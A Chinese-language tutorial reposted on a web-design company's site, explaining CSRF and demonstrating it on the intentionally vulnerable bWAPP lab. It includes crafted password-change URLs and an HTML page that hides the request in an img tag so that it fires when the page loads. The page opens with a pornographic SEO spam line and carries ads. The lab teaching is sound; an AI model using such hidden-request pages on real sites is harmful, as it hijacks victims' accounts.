免费观看又色又爽又黄的小说免费_美女福利视频国产片_亚洲欧美精品_美国一级大黄大色毛片

如何解析CSRF漏洞

這篇文章給大家介紹如何解析CSRF漏洞,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

公司主營業務:網站制作、成都網站建設、移動網站開發等業務。幫助企業客戶真正實現互聯網宣傳,提高企業的競爭能力。創新互聯建站是一支青春激揚、勤奮敬業、活力青春激揚、勤奮敬業、活力澎湃、和諧高效的團隊。公司秉承以“開放、自由、嚴謹、自律”為核心的企業文化,感謝他們對我們的高要求,感謝他們從不同領域給我們帶來的挑戰,讓我們激情的團隊有機會用頭腦與智慧不斷的給客戶帶來驚喜。創新互聯建站推出郾城免費做網站回饋大家。

CSRF:跨站請求偽造,偽裝成用戶身份來執行一些非用戶自愿的惡意以及非法操作

CSRF和XSS區別:

1、CSRF需要登陸后操作,XSS不需要

2、CSRF通過偽裝成受信任用戶請求受信任的網站

一、環境:BWAPP

二、登陸,默認賬號為:bee,密碼為:bug

如何解析CSRF漏洞

三、選擇從在csrf的頁面,將密碼修改為1111,change

四、分析url

http://192.168.1.119/bwapp/csrf_1.php?password_new=1111&password_conf=1111&action=change

五、退出賬號,重新登陸一下,密碼已經修改為1111

六、重修修改一下url,直接訪問這個這個地址,

http://192.168.1.119/bwapp/csrf_1.php?password_new=2222&password_conf=2222&action=change

密碼被重置為2222

七、隱蔽利用

1、新建一個html頁面,將url地址重新修改一下,添加到img標簽下的src屬性,

<!DOCTYPE html> <html> <head> <title>哎呦不錯哦。。。</title> </head> <body> <h3>好久不見<h3> <img src="http://192.168.1.119/bwapp/csrf_1.php?password_new=3333&password_conf=3333&action=change"> </body> </html>

2、訪問這個html,自動訪問修改后的url,密碼也自動修改了

關于如何解析CSRF漏洞就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

網站題目:如何解析CSRF漏洞
轉載注明:http://m.newbst.com/article24/gssdce.html

成都網站建設公司_創新互聯,為您提供關鍵詞優化做網站企業網站制作網站設計App設計虛擬主機

廣告

聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯

h5響應式網站建設